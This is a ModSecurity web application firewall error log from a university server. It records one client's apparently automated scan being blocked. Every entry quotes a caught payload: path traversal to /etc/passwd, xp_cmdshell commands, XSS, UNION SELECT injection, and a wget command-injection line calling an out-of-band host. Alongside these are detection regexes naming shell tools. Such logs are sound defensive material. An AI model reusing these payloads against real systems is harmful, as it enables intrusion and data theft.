[Tue Aug 29 11:45:30.429308 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:docDownloadPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:docDownloadPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/WealthT24/GetImage"] [unique_id "ZO136sCo-f0AAAfEB2QAAAAO"]
[Tue Aug 29 11:45:35.432840 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML:  exec master.dbo.xp_cmdshell/bin/bash -c cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO1378Co-f0AAAcsLYAAAAAE"]
[Tue Aug 29 11:45:36.547002 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\\\\.exe\\\\b|cmd(?:(?:32)?\\\\.exe\\\\b|\\\\b\\\\W*?\\\\/c))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "213"] [id "950002"] [rev "3"] [msg "System Command Access"] [data "Matched Data: cmd/c found within XML:  exec master.dbo.xp_cmdshell cmd/c ipconfig "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO138MCo-f0AAAib5sAAAAAA"]
[Tue Aug 29 11:45:43.586894 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g1g9jm6buyieno.oast.site found within TX:1: cjmnbitjmimt14dgn26g1g9jm6buyieno.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/v1/avatars/favicon"] [unique_id "ZO1398Co-f0AAAib5t4AAAAA"]
[Tue Aug 29 11:45:47.443873 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:file: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/wordfenceClass.php"] [unique_id "ZO13@8Co-f0AAAhui1MAAAAr"]
[Tue Aug 29 11:45:48.658682 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/candidate-application-form/downloadpdffile.php"] [unique_id "ZO13-MCo-f0AAAg-pRwAAAAR"]
[Tue Aug 29 11:45:48.995657 2023] [:error] [pid 2232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:obj_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:obj_name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13-MCo-f0AAAi4NDUAAAAQ"]
[Tue Aug 29 11:45:49.388045 2023] [:error] [pid 2232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:eeFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:eeFile: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/simple-file-list/includes/ee-downloader.php"] [unique_id "ZO13-cCo-f0AAAi4NDgAAAAQ"]
[Tue Aug 29 11:45:51.425171 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:Path: Classes/../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/XMII/Catalog"] [unique_id "ZO13-8Co-f0AAAi2x-IAAAAN"]
[Tue Aug 29 11:45:56.410460 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/localize-my-post/ajax/include.php"] [unique_id "ZO14BMCo-f0AAAi2x-0AAAAN"]
[Tue Aug 29 11:46:01.367525 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/SolarWinds/InformationService/v3/Json/Query"] [unique_id "ZO14CcCo-f0AAAdxUoYAAAAC"]
[Tue Aug 29 11:46:01.419850 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:where: place\\x22><svg onload=confirm(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/7/0/33/1d/www.citysearch.com/search"] [unique_id "ZO14CcCo-f0AAAib5wYAAAAA"]
[Tue Aug 29 11:46:02.409372 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/cgiServer.exx"] [unique_id "ZO14CsCo-f0AAAhrqNoAAAAo"]
[Tue Aug 29 11:46:02.429376 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/InformationService/v3/Json/Query"] [unique_id "ZO14CsCo-f0AAAhrqNsAAAAo"]
[Tue Aug 29 11:46:07.382787 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:state. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:state: $(wget http:/cjmnbitjmimt14dgn26gw74pttu9ukg8h.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/certmngr.cgi"] [unique_id "ZO14D8Co-f0AAAhlz@4AAAAi"]
[Tue Aug 29 11:46:08.428863 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:SEARCH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:SEARCH: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EMCo-f0AAAfEB50AAAAO"]
[Tue Aug 29 11:46:09.509495 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAib5ywAAAAA"]
[Tue Aug 29 11:46:09.550738 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:content: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAhtjjIAAAAq"]
[Tue Aug 29 11:46:12.542344 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FMCo-f0AAAdxUqsAAAAC"]
[Tue Aug 29 11:46:12.542413 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:path: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/api/file"] [unique_id "ZO14FMCo-f0AAAi0JJgAAAAK"]
[Tue Aug 29 11:46:13.386274 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/glpi/plugins/barcode/front/send.php"] [unique_id "ZO14FcCo-f0AAAib50IAAAAA"]
[Tue Aug 29 11:46:13.387799 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:field: updatexml(1,version(),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/api/get-organizations"] [unique_id "ZO14FcCo-f0AAAhrqPcAAAAo"]
[Tue Aug 29 11:46:13.481724 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filepath: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FcCo-f0AAAhl0AwAAAAi"]
[Tue Aug 29 11:46:14.471579 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/org_execl_download.action"] [unique_id "ZO14FsCo-f0AAAhBSGMAAAAX"]
[Tue Aug 29 11:46:15.351485 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO14F8Co-f0AAAdxUroAAAAC"]
[Tue Aug 29 11:46:15.610218 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:webpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:webpage: ../../AutoCE.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/IND780/excalweb.dll"] [unique_id "ZO14F8Co-f0AAAib51QAAAAA"]
[Tue Aug 29 11:46:18.390744 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:country: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/cities"] [unique_id "ZO14GsCo-f0AAAi0JKoAAAAK"]
[Tue Aug 29 11:46:18.431471 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14GsCo-f0AAAdxUsoAAAAC"]
[Tue Aug 29 11:46:19.499795 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"package":";id;#"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within ARGS_NAMES:{\\x22package\\x22:\\x22;id;#\\x22}: {\\x22package\\x22:\\x22;id;#\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php"] [unique_id "ZO14G8Co-f0AAAhgoOAAAAAb"]
[Tue Aug 29 11:46:19.552957 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14G8Co-f0AAAdxUtQAAAAC"]
[Tue Aug 29 11:46:20.388519 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:/etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:/etc/passwd: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/Export_Log"] [unique_id "ZO14HMCo-f0AAAhl0CAAAAAi"]
[Tue Aug 29 11:46:22.420499 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:customerTID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:customerTID: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/supportInstaller"] [unique_id "ZO14HsCo-f0AAAi-RBIAAAAH"]
[Tue Aug 29 11:46:27.479623 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:f: /./etc/./passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/img.php"] [unique_id "ZO14I8Co-f0AAAi0JNEAAAAK"]
